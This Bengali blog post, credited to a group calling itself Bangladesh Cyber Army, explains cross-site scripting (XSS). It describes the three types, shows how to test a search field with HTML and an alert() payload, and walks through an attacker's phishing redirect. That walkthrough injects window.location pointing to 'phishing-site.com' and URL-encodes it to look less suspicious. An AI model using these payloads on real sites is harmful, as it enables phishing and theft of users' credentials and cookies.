!i!i!i ক্রস সাইট স্ক্রিপ্টিং (XSS) + ভিডিও টিউটোরিয়াল !i!i!i

4
468

Cross site scripting (XSS) তখনই হয় যখন কোন ইউজার ম্যালিসিয়াস কোড কোন website এ প্রবেশ করায়।যার কারনে ওয়েব অ্যাপ্লিকেশন এমন ভাবে কাজ করে যা তার করার কথা না।XSS attacks অনেক জনপ্রিয় এবং অনেক বড় website এর দ্বারা আক্রান্ত হয়েছে যার মাঝে FBI, CNN, Ebay, Apple, Microsft,AOL রয়েছে। কিছু ওয়েবসাইট ফিচার XSS attack এর জন্য vulnerable যেমন
• Search Engines
• Login Forms
• Comment Fields
এখানে ৩ রকমের XSS attack আছে।

xss !i!i!i ক্রস সাইট স্ক্রিপ্টিং (XSS) + ভিডিও টিউটোরিয়াল !i!i!i

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

১।Local-Local XSS attack বন্ধ করা অনেক দুষ্কর এবং কঠিন।এই attack এর জন্য browser vulnerability এ exploit দরকার।এই ধরনের attack এর মাধ্যমে এক জন হ্যাকার তোমার computer এ worms, spambots, install করতে পারে।

২।Non-Persistent – Non-Persistent attack হল সব থেকে সাধারন attack এবং টা আসলে ওয়েবসাইটের কোন ক্ষতি করে না ।Non-persistent attack এর মাধ্যমে ওয়েবসাইটে সাধারণ কিছু স্ক্রিপ্ট চালানো যায়।এই attack টি শুধু মাত্র কোড করা URL এর মদ্ধেই সীমাবদ্ধ অর্থাৎ অ্যাড্রেসবারে নির্দিষ্ট URL প্রবেশ করালেই এই attack এর ফল পাওয়া যাবে।

৩।Persistent –Persistent attack সাধারনত guest book, forum,shout box এধরনের ওয়েব অ্যাপ্লিকেশনের বিরুদ্ধে করা হয়।হ্যাকার persistent attacks এর মাধ্যমে এগুলো করতে পারেঃ
• ওয়েবসাইটের কুকি চুরি,
• ওয়ার্ম ছড়াতে পারে,
• এমনকি ওয়েবসাইট ডিফেসও করতে পারে।
এখন তুমি যান cross site scripting কি ।একটা ওয়েবসাইট কিভাবে vulnerable হয়?

১। যদি ওখানে search field থাকে তাহলে একটা শব্দ প্রবেশ করাও।যদি শব্দ টি পরের পেজে আবার দেখায় তাহলে সেটা vulnerable হওয়ার একটা সম্ভবনা আছে।

২। এখন আমরা কিছু HTML প্রবেশ করাব।আমরা

hi

,প্রবেশ করাব যদি শব্দটি স্বাভাবিকের থেকে বড় আকারে(চিত্রের মত) “hi” দেখায়।
তাহলে তা vulnerable।

৩। এখন আমরা JavaScript প্রবেশ করাব। alert(“hi”); এটা Search করলে যদি “hi” একটি পপআপ বক্সে দেখায় site টি XSS এর জন্য vulnerable।

৪।এসব উদাহারন গুলো non-persistent।যদি কোন হ্যাকার guestbook বা এমন কোন কিছু পায় যা vulnerable তাহলে তাকে persistent বানাতে পারবে।

হ্যাকার যদি JavaScript ও PHP এ পারদর্শী থাকে তাহলে সে advanced XSS attack এর মাধ্যমে তোমার cookies চুরি করতে পারবে ও XSS worms ছড়িয়ে দিতে পারবে।আমি দেখাব phishing এর সাহায্যে হ্যাকার কিভাবে xss ব্যবহার করে।

১। মনে করি হ্যাকার www.victim-site.com থেকে password চুরি করতে চায়।যদি সে ওয়েবসাইট এর কোন জায়গা থেকে XSS vulnerability খুজে পায় তাহলে সে টার্গেট ওয়েবসাইট কে তার ফিশিং ওয়েবসাইটে redirect করে নিতে সক্ষম হবে।

২।উদাহরনস্বরূপ আমি যদি JavaScript টি search box এ প্রবেশ করাই তাহলে যে URL টি পাবো তা টা দেখতে নিচের মত হবে।

৩। URL এ ?searchbox= এবং &search এর মাঝে সব টুকু নিচের JavaScript code দ্বারা replace করতে হবেঃ

window.location = “http://phishing-site.com”

৪।তারপর finished link এ গেলে টার্গেট ওয়েবসাইটটি ফিশিং ওয়েবসাইটে redirect করে দিবে ।URL কে আরও আসল ও কম সন্দেহজনক দেখাতে হ্যাকার এটি encode করতে পারে।তুমি নিম্নের ওয়েবসাইটটি থেকে encode করতে পার।

URL Decoder & URL Encoder

৫।এনকোডেড URL টি হবে এমনঃ

http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

SS Shell v0.3.9 – Cross Site Scripting Backdoor Tool
Want to Learn Penetration Testing

ভিডিও টিউটোরিয়াল

পোস্ট টি ভালো লাগলে লাইক 1T
P1n1X_Cr3w
Bangladesh Cyber Army
TunerPage

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

4 মন্তব্য

মন্তব্য দিন আপনার